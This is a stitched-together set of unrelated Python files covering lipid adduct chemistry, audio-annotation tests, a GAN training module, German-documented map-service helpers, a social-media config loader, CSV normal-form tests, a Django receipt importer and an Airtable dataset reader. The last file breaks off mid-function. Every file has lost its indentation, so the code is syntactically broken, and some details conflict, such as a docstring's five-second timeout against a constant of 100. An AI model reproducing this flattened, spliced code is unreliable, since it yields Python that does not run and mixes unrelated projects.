IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from pygoslin.domain.Element import Element
from pygoslin.parser.ParserCommon import SumFormulaParser
from pygoslin.domain.LipidExceptions import *
class Adduct:
adduct_sum_formula_parser = SumFormulaParser()
adducts = {"+H": {Element.H: 1},
"+2H": {Element.H: 2},
"+3H": {Element.H: 3},
"+4H": {Element.H: 4},
"-H": {Element.H: -1},
"-2H": {Element.H: -2},
"-3H": {Element.H: -3},
"-4H": {Element.H: -4},
"+H-H2O": {Element.H: -1, Element.O: -1},
"+NH4": {Element.N: 1, Element.H: 4},
"+Cl": {Element.Cl: 1},
"+HCOO": {Element.H: 1, Element.C: 1, Element.O: 2},
"+CH3COO": {Element.H: 3, Element.C: 2, Element.O: 2}
}
adduct_charges = {"+H": 1, "+2H": 2, "+3H": 3, "+4H": 4, "-H": -1,
"-2H": -2, "-3H": -3, "-4H": -4, "+H-H2O": 1,
"+NH4": 1, "+Cl": -1, "+HCOO": -1, "+CH3COO": -1
}
def __init__(self, sum_formula, adduct_string, charge = 1, sign = 1):
self.sum_formula = sum_formula
self.adduct_string = adduct_string
self.charge = charge
self.set_charge_sign(sign)
def set_charge_sign(self, sign):
if sign in {-1, 1}:
self.charge_sign = sign
else: raise ConstraintViolationException("Sign can only be - or +")
def get_lipid_string(self):
if self.charge == 0: return "[M]"
return "[M%s%s]%i%s" % (self.sum_formula, self.adduct_string, self.charge, "+" if self.charge_sign > 0 else "-")
def get_elements(self):
elements = {e: 0 for e in Element}
if self.adduct_string in Adduct.adducts:
if Adduct.adduct_charges[self.adduct_string] != self.get_charge():
raise ConstraintViolationException("Provided charge '%i' in contradiction to adduct '%s' charge '%i'." % (self.get_charge(), self.adduct_string, Adduct.adduct_charges[self.adduct_string]))
for k, v in Adduct.adducts[self.adduct_string].items():
elements[k] = v
else:
raise ConstraintViolationException("Adduct '%s' is unknown." % self.adduct_string)
return elements
def get_charge(self):
return self.charge * self.charge_sign
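# --- Illustrative sketch (added; not part of pygoslin): building a protonated adduct
# --- and querying its string form and element bookkeeping, using only the API above.
#   adduct = Adduct(sum_formula="", adduct_string="+H", charge=1, sign=1)
#   adduct.get_lipid_string()   # -> "[M+H]1+"
#   adduct.get_elements()       # -> dict over Element with Element.H mapped to 1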
|
import filecmp
import pytest
import pandas as pd
import pandera
import crowsetta.formats
class TestRavenSchema:
COLUMNS_MAP = {
"Begin Time (s)": "begin_time_s",
"End Time (s)": "end_time_s",
"Low Freq (Hz)": "low_freq_hz",
"High Freq (Hz)": "high_freq_hz",
"Species": "annotation"
}
def test_raven_schema_phn_df(self,
a_raven_txt_file):
df = pd.read_csv(a_raven_txt_file, sep='\t')
df.columns = df.columns.map(self.COLUMNS_MAP)
df = crowsetta.formats.bbox.raven.RavenSchema.validate(df)
# if validation worked, we get back a DataFrame
assert isinstance(df, pd.DataFrame)
def test_raven_schema_bad_df(self,
a_raven_txt_file):
df = pd.read_csv(a_raven_txt_file, sep='\t')
# if we do not `map` the names, they will already be invalid
with pytest.raises(pandera.errors.SchemaError):
crowsetta.formats.bbox.raven.RavenSchema.validate(df)
def test_from_file(a_raven_txt_file,
raven_dataset_annot_col):
raven = crowsetta.formats.bbox.Raven.from_file(annot_path=a_raven_txt_file,
annot_col=raven_dataset_annot_col)
assert isinstance(raven, crowsetta.formats.bbox.Raven)
def test_from_file_str(a_raven_txt_file,
raven_dataset_annot_col):
a_raven_txt_file = str(a_raven_txt_file)
raven = crowsetta.formats.bbox.Raven.from_file(annot_path=a_raven_txt_file,
annot_col=raven_dataset_annot_col)
assert isinstance(raven, crowsetta.formats.bbox.Raven)
def test_file_with_no_rows_raises(raven_txt_file_with_no_rows):
with pytest.raises(ValueError):
crowsetta.formats.bbox.Raven.from_file(annot_path=raven_txt_file_with_no_rows)
def test_to_bbox(a_raven_txt_file,
raven_dataset_annot_col):
raven = crowsetta.formats.bbox.Raven.from_file(annot_path=a_raven_txt_file,
annot_col=raven_dataset_annot_col)
bboxes = raven.to_bbox()
assert isinstance(bboxes, list)
assert all(
[isinstance(bbox, crowsetta.BBox) for bbox in bboxes]
)
def test_to_annot(a_raven_txt_file,
raven_dataset_annot_col):
raven = crowsetta.formats.bbox.Raven.from_file(annot_path=a_raven_txt_file,
annot_col=raven_dataset_annot_col)
annot = raven.to_annot()
assert isinstance(annot, crowsetta.Annotation)
assert hasattr(annot, 'bboxes')
bboxes = annot.bboxes
assert isinstance(bboxes, list)
assert all(
[isinstance(bbox, crowsetta.BBox) for bbox in bboxes]
)
def test_to_raven(a_raven_txt_file,
raven_dataset_annot_col,
tmp_path):
raven = crowsetta.formats.bbox.Raven.from_file(annot_path=a_raven_txt_file,
annot_col=raven_dataset_annot_col)
annot_out_path = tmp_path / a_raven_txt_file.name
raven.to_file(annot_path=annot_out_path)
df_txt = pd.read_csv(a_raven_txt_file, sep='\t')
df_out = pd.read_csv(annot_out_path, sep='\t')
assert df_txt.equals(df_out)
|
from argparse import ArgumentParser
from collections import OrderedDict
from typing import Tuple
import torchvision
from pytorch_lightning import LightningModule
import torch
import torch.nn.functional as F
from gan.discriminators import Discriminator
from gan.generators import Generator
class Gan(LightningModule):
"""Adapted from Lightning GAN example"""
def __init__(
self,
img_shape: Tuple[int, int, int],
latent_dim: int,
pos_label: float = 0.9,
neg_label: float = 0.1,
lr: float = 1e-3,
b1: float = 0.9,
b2: float = 0.999,
**kwargs
):
super(Gan, self).__init__()
assert 0. <= neg_label < pos_label <= 1., 'Invalid labels'
self.latent_dim = latent_dim
self.lr = lr
self.b1 = b1
self.b2 = b2
self.pos_label = pos_label
self.neg_label = neg_label
# networks
self.generator = Generator(latent_dim=latent_dim, img_shape=img_shape)
self.discriminator = Discriminator(img_shape=img_shape)
# cache for generated images
self.generated_imgs = None
self.last_imgs = None
def forward(self, z):
return self.generator(z)
def adversarial_loss(self, y_hat, y):
return F.binary_cross_entropy(y_hat, y)
def training_step(self, batch, batch_nb, optimizer_idx):
imgs, _ = batch
self.last_imgs = imgs
# train generator
if optimizer_idx == 0:
# sample noise
z = torch.randn(imgs.shape[0], self.latent_dim)
if self.on_gpu:
z = z.cuda(imgs.device.index)
self.generated_imgs = self(z)
            # ground truth labels for the generator step (all ones, i.e. "real")
valid = torch.ones(imgs.size(0), 1)
if self.on_gpu:
valid = valid.cuda(imgs.device.index)
# adversarial loss is binary cross-entropy
g_loss = self.adversarial_loss(self.discriminator(self.generated_imgs), valid)
tqdm_dict = {'g_loss': g_loss}
output = OrderedDict({
'loss': g_loss,
'progress_bar': tqdm_dict,
'log': tqdm_dict
})
return output
# train discriminator
if optimizer_idx == 1:
valid = torch.ones(imgs.size(0), 1) * self.pos_label
if self.on_gpu:
valid = valid.cuda(imgs.device.index)
real_loss = self.adversarial_loss(self.discriminator(imgs), valid)
fake = torch.ones(imgs.size(0), 1) * self.neg_label
if self.on_gpu:
fake = fake.cuda(imgs.device.index)
fake_loss = self.adversarial_loss(
self.discriminator(self.generated_imgs.detach()), fake)
d_loss = (real_loss + fake_loss) / 2
tqdm_dict = {'d_loss': d_loss}
output = OrderedDict({
'loss': d_loss,
'progress_bar': tqdm_dict,
'log': tqdm_dict
})
return output
def configure_optimizers(self):
lr = self.lr
b1 = self.b1
b2 = self.b2
opt_g = torch.optim.Adam(self.generator.parameters(), lr=lr, betas=(b1, b2))
opt_d = torch.optim.Adam(self.discriminator.parameters(), lr=lr, betas=(b1, b2))
return [opt_g, opt_d], []
@staticmethod
def add_model_specific_args(parent_parser):
parser = ArgumentParser(parents=[parent_parser], add_help=False)
parser.add_argument('--latent_dim', type=int, default=128)
parser.add_argument('--lr', type=float, default=1e-3)
parser.add_argument('--b1', type=float, default=.9)
parser.add_argument('--b2', type=float, default=.999)
parser.add_argument('--neg_label', type=float, default=0.)
parser.add_argument('--pos_label', type=float, default=.9)
return parser
def on_epoch_end(self):
z = torch.randn(8, self.latent_dim)
if self.on_gpu:
z = z.cuda(self.last_imgs.device.index)
sample_imgs = self(z)
grid = torchvision.utils.make_grid(sample_imgs)
self.logger.experiment.add_image(f'generated_images', grid, self.current_epoch)
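# --- Illustrative sketch (added; not part of the original module): wiring the
# --- model-specific CLI arguments and building a Gan for 28x28 grayscale images.
# --- The Generator/Discriminator constructors are assumed to accept the keyword
# --- arguments used in __init__ above; the flag values here are arbitrary.
#   parent = ArgumentParser()
#   parser = Gan.add_model_specific_args(parent)
#   args = parser.parse_args(["--latent_dim", "64", "--lr", "2e-4"])
#   model = Gan(img_shape=(1, 28, 28), **vars(args))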
|
"""
Module ``_helpers``.
"""
import xml.dom.minidom as dom
import urllib.request
from ows_checker._helpers import xml2dict
DEFAULT_TIMEOUT = 100
class ResponseDict(dict):
"""
Die Klasse L{ResponseDict} formuliert ein C{dict}-Objekt mit vier festen
Parametern und vier festen Rückgabewerten.
B{Aufruf}:
>>> r = ResponseDict("WMS-04 Checker", ["alles gut"], True, ["WMS-04"])
>>> r
{'checker': "WMS-04 Checker", 'results':["alles gut"], 'status': True, 'hints':["WMS-04"]}
>>> r.status
True
@ivar checker: Name der Methode
@type checker: str, bytes
@ivar results: Resultat(e)
@type results: list
@ivar status: Status der Überprüfung
@type status: bool
@ivar hints: Hinweise bezüglich Richtlinie(n)
@type hints: list
@ivar response_dict: Zusammengefasstes Schema
@type response_dict: dict
"""
def __init__(self, checker, results, status, hints = False):
"""
@param checker: Name der Methode
@type checker: str, bytes, list
@param results: Resultat(e)
@type results: str, bytes, list
@param status: Status der Überprüfung
@type status: bool
@param hints: Optionale Hinweise bezüglich Richtlinie(n)
@type hints: str, bytes, list
"""
self.hints = hints
if isinstance(checker, (str, bytes)):
self.checker = checker
else:
raise ValueError("Es muss ein String für Checker übergeben werden")
if isinstance(results, (str, bytes)):
self.results = [results]
elif isinstance(results, list):
self.results = results
else:
raise ValueError(u"Es muss ein String oder eine Liste für Results übergeben werden")
if isinstance(status, bool):
self.status = status
else:
raise ValueError(u"Es muss ein Boolean für Status übergeben werden")
if self.hints:
if isinstance(hints, (str)):
self.hints = [(hints.encode('utf-8'))]
elif isinstance(hints, list):
self.hints = hints
self.response_dict = {'checker':self.checker,
'results':self.results,
'status':self.status,
'hints':self.hints}
dict.__init__(self, self.response_dict)
def URL2File(url, headers={}, timeout=DEFAULT_TIMEOUT, auth={}):
"""
Wandelt eine URL in ein Dateiobjekt um.
B{Funktionsweise}:
1. Es wird ein HTTP-Request aus C{url} formuliert
2. Es wird ein Dateiobjekt erstellt und dieses zurückgegeben
Zusätzlich wird ein Timeout von standardmässig fünf
Sekunden verwendet, um die Usability nicht zu beeinträchtigen.
B{Beispiel}:
>>> u = URL2File("http://example.com/test.xml")
>>> u.info().gettype()
"text/xml"
@param url: URL
@type url: str
@param headers: Optionale Header-Informationen
@type headers: dict
@param timeout: Timeout in Sekunden
@type timeout: int
@return: Datei
@rtype: C{file}-Objekt
"""
url = _ns(url)
headers.update({
'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
})
if auth:
username = auth.get('user','user')
password = auth.get('pass','<PASSWORD>')
        passman = urllib.request.HTTPPasswordMgrWithDefaultRealm()
        passman.add_password(None, url, username, password)
        authhandler = urllib.request.HTTPBasicAuthHandler(passman)
        opener = urllib.request.build_opener(authhandler)
        urllib.request.install_opener(opener)
file = urllib.request.urlopen(url)
else:
req = urllib.request.Request(url, None, headers)
file = urllib.request.urlopen(url=req, timeout=timeout)
return file
def URL2XML2Dict(url):
xmldict = xml2dict.XML2Dict()
f = URL2File(url)
    tree = dom.parse(f)
    header = f.info().get_content_type()
    f.close()
    assert 'xml' in header
for node in tree.childNodes:
if node.nodeType == dom.Node.ELEMENT_NODE:
body = node.toxml('utf-8')
xmldict = xmldict.fromstring(body)
return xmldict
def ns(e):
"""
Ein Workaround für XML-Namespaces, von C{pickle} erzeugten C{'__dict__'}-Objekten
und von L{_helpers.xml2dict.XML2Dict} erzeugten C{'value'}-Objekten.
B{Beispiel 1}:
>>> e = {'value':'Ein Wert', '__dict__':{}}
>>> ns(e)
"Ein Wert"
B{Beispiel 2}: z.B. falls ein C{list}-Objekt mit C{dict.keys()} erzeugt wurde
>>> e = ['value', 'Ein Wert', 'Noch ein Wert', 'namespace', '__dict_']
>>> ns(e)
['Ein Wert', 'Noch ein Wert']
@param e: Objekt mit unbrauchbaren und brauchbaren Werten
@type e: str, list, dict
@return: Objekt mit brauchbaren Werten
@rtype: str, list
"""
entity = None
# {'__dict__':{}, ...}
if isinstance(e, dict):
e.pop('__dict__',None)
entity = e.value
# ['value', 'namespace', '__dict__', ...]
elif isinstance(e, list):
if 'value' in e:
e.remove('value')
if 'namespace' in e:
e.remove('namespace')
if '__dict__' in e:
e.remove('__dict__')
entity = e
elif isinstance(e, str):
entity = e
else:
entity = e
return entity
def unify(l):
"""
L{unify} löscht alle Duplikate aus einer Liste.
@param l: Liste mit Duplikaten
@type l: list
@return: Liste ohne Duplikate
@rtype: list
"""
return list(set(l))
def value(l):
"""
Gibt die Wert des Schlüssels C{value} aus einem dict in einer Liste C{l} zurück.
B{Beispiel}:
>>> l = [{'value': 'vnd.ogc.wms_xml'}, {'value': 'vnd.ogc.gml'}]
>>> value(l)
['vnd.ogc.wms_xml', 'vnd.ogc.gml' ]
@param l: Liste mit dict-Objekten
@type l: list, str
@return: Werte des Attributs C{value}
@rtype: list
"""
v = []
if isinstance(l, dict):
v.append(l.value)
if isinstance(l, list):
for i in l:
v.append(i.value)
elif isinstance(l, str):
v = [l]
return v
def removeCharsetFromMime(s):
"""
Löscht z.B. die Zeichenkette C{UTF-8} aus der Zeichenkette
C{text/xml;UTF-8} heraus, sodass nur C{text/xml} zurückgegeben wird.
B{Beispiel}:
>>> s = "text/xml;UTF-8"
>>> removeCharsetFromMime(s)
"text/xml"
@param s: Zeichenkette C{text/xml;UTF-8}
@type s: str
@return: Zeichenkette C{text/xml}
@rtype: str
"""
if "charset" in s:
l = s.split(";")
l = l[0]
else:
l = s
return l
def filterkey(e, key, ns=False):
"""
Gibt eine Liste aus der Liste C{e} mit dem Attribut C{key} zurück.
B{Beispiel 1}: Herauslesen der SRS aus einer Liste, die C{dict}'s enthält.
>>> e = [{'SRS':'12345', 'Name':'WGS-1'}, {'SRS':'54321', 'Name':'WGS-2'}]
>>> key = "SRS"
>>> filterkey(e, key)
['12345', '54321']
B{Beispiel 2}: Herauslesen des Namens aus einer Liste, die C{dict}'s enthält.
>>> e = [{'SRS':'12345', 'Name':'WGS-1'}, {'SRS':'54321', 'Name':'WGS-2'}]
>>> key = "Name"
>>> filterkey(e, key)
['WGS-1', 'WGS-2']
@param e: Liste
@type e: list
@param key: Schlüssel
@type key: str
@param ns: Status, ob zusätzlich L{_helpers.ns} verwendet werden soll
@type ns: bool
@return: Liste mit den gefundenen Attributen C{key}
@rtype: list
"""
l = []
key_split = key.split("=")
if isinstance(e, list):
for i in e:
if len(key_split)>1:
if i[key_split[0]] == key_split[1]:
if ns:
l.append(_ns(i[key_split[0]]))
else:
l.append(i[key_split[0]])
else:
if ns:
l.append(_ns(i[key]))
else:
l.append(i[key])
return l
def b(node):
"""
Converts a string "0" or "1" to Python's ``True`` and ``False``
"""
return bool(int(node))
def dict2list(obj):
"""
Converts an ``obj`` (Dict, List) to a List
"""
if isinstance(obj, dict):
return [obj]
return obj
_b = b
_filterkey = filterkey
_removeCharsetFromMime = removeCharsetFromMime
_value = value
_ns = ns
|
<gh_stars>1-10
from pathlib import Path
import logging
import configparser
import pylast
import tweepy
import os
from mastodon import Mastodon
logger = logging.getLogger()
logging.getLogger("pylast").setLevel(logging.WARNING)
def check_config(config_file): # pragma: no cover
config_file = os.path.expanduser(config_file)
user_config_dir = os.path.expanduser("~/.config/lastfm_pg/")
logger.debug("Checking configuration at %s.", config_file)
if Path(config_file).is_file():
try:
global CONFIG
CONFIG = configparser.ConfigParser()
CONFIG.read(config_file)
api_key = CONFIG["lastfm"]["api_key"]
except Exception as e:
logger.error(
(
"Error with the config file. Be sure to have a valid "
"~/.config/lastfm_pg/config.ini file. Error : %s"
),
e,
)
exit()
else:
if not os.path.exists(user_config_dir):
logger.info(
("Configuration folder not found. " "Creating ~/.config/lastfm_pg/.")
)
os.makedirs(user_config_dir)
if not Path(config_file).is_file():
sample_config = (
"[lastfm]\n"
"username=username_here\n"
"api_key=api_key_here\n"
"api_secret=api_secret_here\n"
"\n"
"[twitter]\n"
"consumer_key=consumer_key_here\n"
"secret_key=secret_key_here\n"
"access_token=access_token_here\n"
"access_token_secret=access_token_secret_here\n"
"\n"
"[mastodon]\n"
"api_base_url=api_base_url_here\n"
"login_email=login_email_here\n"
"password=<PASSWORD>"
)
with open(config_file, "w") as f:
f.write(sample_config)
logger.info(
(
"A sample configuration file has been created at "
"~/.config/lastfm_pg/config.ini."
)
)
exit()
def twitterconnect(): # pragma: no cover
consumer_key = CONFIG["twitter"]["consumer_key"]
secret_key = CONFIG["twitter"]["secret_key"]
access_token = CONFIG["twitter"]["access_token"]
access_token_secret = CONFIG["twitter"]["access_token_secret"]
auth = tweepy.OAuthHandler(consumer_key, secret_key)
auth.set_access_token(access_token, access_token_secret)
return tweepy.API(auth)
def mastodonconnect(): # pragma: no cover
if not Path("mastodon_clientcred.secret").is_file():
Mastodon.create_app(
"mastodon_bot_lastfm_pg",
api_base_url=CONFIG["mastodon"]["api_base_url"],
to_file="mastodon_clientcred.secret",
)
if not Path("mastodon_usercred.secret").is_file():
mastodon = Mastodon(
client_id="mastodon_clientcred.secret",
api_base_url=CONFIG["mastodon"]["api_base_url"],
)
mastodon.log_in(
CONFIG["mastodon"]["login_email"],
CONFIG["mastodon"]["password"],
to_file="mastodon_usercred.secret",
)
mastodon = Mastodon(
access_token="<PASSWORD>",
api_base_url=CONFIG["mastodon"]["api_base_url"],
)
return mastodon
def lastfmconnect(): # pragma: no cover
api_key = CONFIG["lastfm"]["api_key"]
api_secret = CONFIG["lastfm"]["api_secret"]
username = CONFIG["lastfm"]["username"]
network = pylast.LastFMNetwork(
api_key=api_key, api_secret=api_secret, username=username
)
return network
def get_twitter_username(api):
return api.me().screen_name
def get_lastfm_username(api):
return api.username
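# --- Illustrative sketch (added; not part of the original module): typical call order.
# --- check_config() must run first so the module-level CONFIG is populated before the
# --- connect helpers read it; the config path below is the one the module itself creates.
#   check_config("~/.config/lastfm_pg/config.ini")
#   network = lastfmconnect()
#   api = twitterconnect()
#   print(get_lastfm_username(network), get_twitter_username(api))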
|
# -*- coding: utf-8 -*-
"""
Unit tests for the normal form detection.
Author: <NAME>
"""
import unittest
from clevercsv.dialect import SimpleDialect
from clevercsv.normal_form import (
is_form_1,
is_form_2,
is_form_3,
is_form_4,
is_form_5,
)
class NormalFormTestCase(unittest.TestCase):
def test_form_1(self):
dialect = SimpleDialect(delimiter=",", quotechar='"', escapechar="")
self.assertTrue(is_form_1('"A","B","C"', dialect))
self.assertTrue(is_form_1('"A","B"\n"C","D"\n', dialect))
self.assertTrue(is_form_1('"A","","C"', dialect))
self.assertFalse(is_form_1('"A","B"\n"A"', dialect))
self.assertFalse(is_form_1('"A"\n"B"', dialect))
self.assertFalse(is_form_1('"A"\n"A","B"', dialect))
self.assertFalse(is_form_1('"A",,"C"', dialect))
self.assertFalse(is_form_1('"A",C', dialect))
self.assertFalse(is_form_1('"A"\n"b""A""c","B"', dialect))
def test_form_2(self):
dialect = SimpleDialect(delimiter=",", quotechar="", escapechar="")
self.assertTrue(is_form_2("1,2,3", dialect))
self.assertTrue(is_form_2("1,2,3\na,b,c\n", dialect))
self.assertTrue(is_form_2("<EMAIL>,3", dialect))
self.assertTrue(is_form_2("a,,3\n1,2,3", dialect))
self.assertFalse(is_form_2("1,2,3\n1,2\n4,5,6", dialect))
self.assertFalse(is_form_2("1", dialect))
self.assertFalse(is_form_2('1,"a"', dialect))
self.assertFalse(is_form_2("a;b,3", dialect))
self.assertFalse(is_form_2('"a,3,3\n1,2,3', dialect))
self.assertFalse(is_form_2('a,"",3\n1,2,3', dialect))
def test_form_3(self):
A = SimpleDialect(delimiter=",", quotechar="'", escapechar="")
Q = SimpleDialect(delimiter=",", quotechar='"', escapechar="")
self.assertTrue(is_form_3('A,B\nC,"D"', Q))
self.assertTrue(is_form_3('A,B\nC,"d,e"', Q))
self.assertFalse(is_form_3('A,\nC,"d,e"', Q))
self.assertFalse(is_form_3("3;4,B\nC,D", Q))
self.assertFalse(is_form_3('A,B\n"C",D\n', A))
self.assertTrue(is_form_3('A,B\n"C",D\n', Q))
def test_form_4(self):
quoted = SimpleDialect(delimiter="", quotechar='"', escapechar="")
unquoted = SimpleDialect(delimiter="", quotechar="", escapechar="")
self.assertTrue(is_form_4("A\nB\nC", unquoted))
self.assertTrue(is_form_4("1\n2\n3", unquoted))
self.assertTrue(is_form_4("A_B\n1\n2", unquoted))
self.assertTrue(is_form_4("A&B\n1\n2", unquoted))
self.assertTrue(is_form_4("A&B\n-1\n2", unquoted))
self.assertTrue(is_form_4('"A"\n"B"\n"C"\n', quoted))
self.assertFalse(is_form_4('"A", "B"\n"B"\n"C"\n', quoted))
self.assertFalse(is_form_4('"A","B"\n"B"\n"C"\n', quoted))
self.assertFalse(is_form_4('"A@b"\n"B"\n"C"\n', quoted))
self.assertFalse(is_form_4('A\n"-1"\n2', unquoted))
self.assertFalse(is_form_4("A B\n-1 3\n2 4", unquoted))
def test_form_5(self):
dialect = SimpleDialect(delimiter=",", quotechar='"', escapechar="")
self.assertTrue(is_form_5('"A,B"\n"1,2"\n"3,4"', dialect))
self.assertTrue(is_form_5('"A,B"\n"1,"\n"2,3"', dialect))
self.assertFalse(is_form_5("A,B\n1,2\n3,4", dialect))
self.assertFalse(is_form_5("A,B\n1,\n2,3", dialect))
self.assertFalse(is_form_5('"A,""B"""\n"1,"\n"2,3"', dialect))
if __name__ == "__main__":
unittest.main()
|
<filename>z/management/commands/loadreports.py
import re
from datetime import datetime
from io import open
from os import walk
from os.path import isdir, isfile, join
import pytz
from django.core.exceptions import ObjectDoesNotExist
from django.core.management.base import BaseCommand
from cyb_oko.settings import TIME_ZONE
from z.models import Kassetransaksjon, Kvittering, Salgsvare, Zrapport
class Command(BaseCommand):
args = "<file or directories ...>"
help = "Load the given z-report files into the database"
#
# Compiled regexes used to parse the input file
#
# Match all lines that we skip
skip_lines = re.compile(
r"^(\s$|\d[A-Z\/]|JOURNAL DES VENTES|FIN DE LECTURE|-D|B\s+\d+\s(TIROIR|TA|AT))"
)
# Match the start date lines
start_date = re.compile(r"^\/(\d{2}-\d{2}-\d{4} \d{2}:\d{2})")
# Match the receipt transaction lines
receipt_transaction = re.compile(
r"^([a-zA-Z])\s+(\d+)\s(.{15})\s+(-?\d+)\s+(-?\d+\.\d{2})"
)
# Match the receipt date line
receipt_date = re.compile(r"^ <(\d{2}-\d{2}-\d{2} \d{2}:\d{2})(\d{6})")
# Match the z-report date line
z_number = re.compile(r"^\s+Z READING NR (\d+)")
#
# Timezone stuff
#
# Store the pytz timezone object for out current timezone
tz = pytz.timezone(TIME_ZONE)
def handle(self, *args, **options):
print("Parsing in timezone: %s" % TIME_ZONE)
for arg in args:
self.parse_files(arg)
def parse_files(self, path):
if isdir(path):
for root, dirs, files in walk(path):
for file in files:
self.parse_file(join(root, file))
elif isfile(path):
self.parse_file(path)
def parse_file(self, file):
with open(file, "rt", encoding="iso8859-1") as f:
# Skip the first line
f.readline()
# Create models
self.z = Zrapport()
self.kvitteringer = []
self.new_receipt()
# Parse each line
for line in f:
self.parse_line(line)
# self.save_z()
def new_receipt(self):
# Store the previous receipt, if needed
if hasattr(self, "kvittering"):
self.kvitteringer.append(self.kvittering)
# Create a new one
self.kvittering = Kvittering()
self.kvittering.linjer = []
def save_z(self):
self.z.save()
self.z.kvitteringer = self.kvitteringer
for k in self.kvitteringer:
if len(k.linjer) > 0:
for linje in k.linjer:
linje.tidspunkt = k.tidspunkt
k.transaksjoner.add(linje)
def parse_line(self, line):
if self.skip_lines.search(line):
return
elif self.receipt_date_line(line):
self.new_receipt()
return
elif self.receipt_transaction_line(line):
return
elif self.z_number_line(line):
return
elif self.start_date_line(line):
return
else:
raise Exception("Unknown line: %s" % line)
def receipt_date_line(self, line):
m = self.receipt_date.search(line)
if m:
self.kvittering.tidspunkt = self.tz.localize(
datetime.strptime(m.group(1), "%d-%m-%y %H:%M")
)
self.kvittering.nummer = int(m.group(2), base=10)
return True
else:
return False
def receipt_transaction_line(self, line):
m = self.receipt_transaction.search(line)
if m:
try:
self.kvittering.linjer.append(
self.to_line(
m.group(1),
m.group(2),
m.group(3).strip(),
m.group(4),
m.group(5),
)
)
except IgnoredLineException:
pass
return True
else:
return False
def z_number_line(self, line):
m = self.z_number.search(line)
if m:
self.z.nummer = int(m.group(1), base=10)
return True
else:
return False
def start_date_line(self, line):
m = self.start_date.search(line)
if m:
if not self.z.tidspunkt:
self.z.tidspunkt = self.tz.localize(
datetime.strptime(m.group(1), "%d-%m-%Y %H:%M")
)
return True
else:
return False
def to_line(self, code, number, name, count, sum):
t = self.type(code)
nummer = int(number, base=10)
if t == "sale" or t == "refund":
try:
vare = Salgsvare.objects.get(kassenr=nummer)
if vare.kassenavn == name:
return Kassetransaksjon(
kvittering=self.kvittering,
salgsvare=vare,
antall=int(count, base=10),
)
else:
self.name_mismatch(vare, name)
except ObjectDoesNotExist:
print("Fant ingen match for: %s %d %s" % (t, nummer, name))
print("Hva vil du gjøre?")
print("Lag ny salgsvare [1]")
print("Lag ny mapping til eksisterende salgsvare [2]")
action = int(input("Velg kommando: "))
if action == 1:
self.create_salgsvare(number)
elif action == 2:
self.create_mapping(number, name)
raise IgnoredLineException()
def type(self, code):
if code == "A":
return "sale"
elif code == "R":
return "payment"
elif code == "x":
return "tax"
elif code == "K":
return "refund"
elif code == "L":
# return 'cancelled_sale'
# Ignore canelled sales
raise IgnoredLineException()
elif code == "c" or code == "h":
raise IgnoredLineException()
else:
raise UnknownLineException("Unknown line code: %s" % code)
def name_mismatch(self, vare, name):
"""
Handler for mismatch between the name stored in the database and the
name stored in the pos system.
"""
print(
'Kassenavn for vare #%d ("%s") matcher ikke ("%s" != "%s")'
% (vare.kassenr, vare.navn, vare.kassenavn, name)
)
print("Oppdater navn på salgsvare [1]")
print("Map til annen vare [2]")
action = int(input("Velg kommando: "))
if action == 1:
vare.kassenavn = name
vare.save()
elif action == 2:
self.find_salgsvare()
# self.create_mapping(vare.kassenr, name)
def create_salgsvare(self, number):
category = input("Kategori: ")
name = input("Navn: ")
account = input("Salgskonto: ")
status = input("Status: ")
print("%s %s %s %s %s" % (category, name, account, status, number))
def create_mapping(self, num, name):
target = int(input("Kassenummer: "))
vare = Salgsvare.objects.get(kassenr=target)
print("Ny map fra %d:%s til %d:%s" % (num, name, vare.kassenr, vare.navn))
def find_salgsvare(self):
while True:
name = input("Søk etter vare: ")
varer = Salgsvare.objects.filter(navn__icontains=name)[:10]
if len(varer) == 0:
print("Fant ingen varer som matcher")
else:
for vare in varer:
print("#%d %s" % (vare.pk, vare.navn))
try:
int(input("Velg en vare (ctrl-c for å søke på nytt): "))
return True
except KeyboardInterrupt:
print("")
class UnknownLineException(Exception):
"""
Thrown when we find a linetype we do not support
"""
pass
class IgnoredLineException(Exception):
"""
An exception to throw when a line should be ignored
"""
pass
|
import time
from typing import Dict, Any
import urllib.parse
import pandas
import requests
from threading import Semaphore, Thread
from kedro.io import AbstractDataSet, DataSetError
class AirtableException(DataSetError):
pass
AIRTABLE_RECORD_ID_COLUMN = '__airtable_id'
AIRTABLE_CREATED_TIME_COLUMN = '__airtable_created_time'
class AirtableDataSet(AbstractDataSet):
BASE_API = 'https://api.airtable.com/v0'
def __init__(
self,
table_name: str,
view: str = '',
credentials: Dict[str, str] = None,
):
"""
:param table_name:
:param credentials:
base_id:
api_key:
"""
self._table_name = table_name
self._view = view
if credentials is None or 'api_key' not in credentials or 'base_id' not in credentials:
raise DataSetError('Credentials must be passed with "api_key" and "base_id" keys')
self._api_key = credentials['api_key']
self._base_id = credentials['base_id']
self._api_semaphore = Semaphore(5)
def _page_url(self, offset=''):
pagination_params = urllib.parse.urlencode({
'pageSize': 100,
'offset': offset,
})
api_url = f'{AirtableDataSet.BASE_API}/' \
f'{self._base_id}/' \
f'{urllib.parse.quote(self._table_name)}?' \
f'{pagination_params}'
return api_url
@property
def _headers(self):
return {
'Authorization': f'Bearer {self._api_key}'
}
def _gen_releaser(self):
semaphores = self._api_semaphore
logger = self._logger
def _releaser():
logger.debug("Waiting Release Sem")
time.sleep(1)
logger.debug("Releasing Sem")
semaphores.release()
return _releaser
def _call_api(self, offset=''):
url = self._page_url(offset=offset)
while True:
self._api_semaphore.acquire(timeout=999999)
self._logger.debug('Ack Sem')
t = Thread(target=self._gen_releaser())
t.daemon = True
resp = requests.get(url, headers=self._headers)
t.start()
if resp.status_code == 429:
time.sleep(30)
continue
elif resp.status_code >= 300:
j = resp.json()
if 'error' in j:
raise AirtableException(j['error']['type'])
else:
raise AirtableException(j)
return resp.json()
def _retrieve_records(self):
j = self._call_api()
if 'error' in j:
raise AirtableException(j['error']['type'])
all_records = j['records']
while 'offset' in j:
j = self._call_api(offset=j['offset'])
all_records += j['records']
return all_records
@staticmethod
def _clean_records(raw_records):
return [
{
**record['fields'],
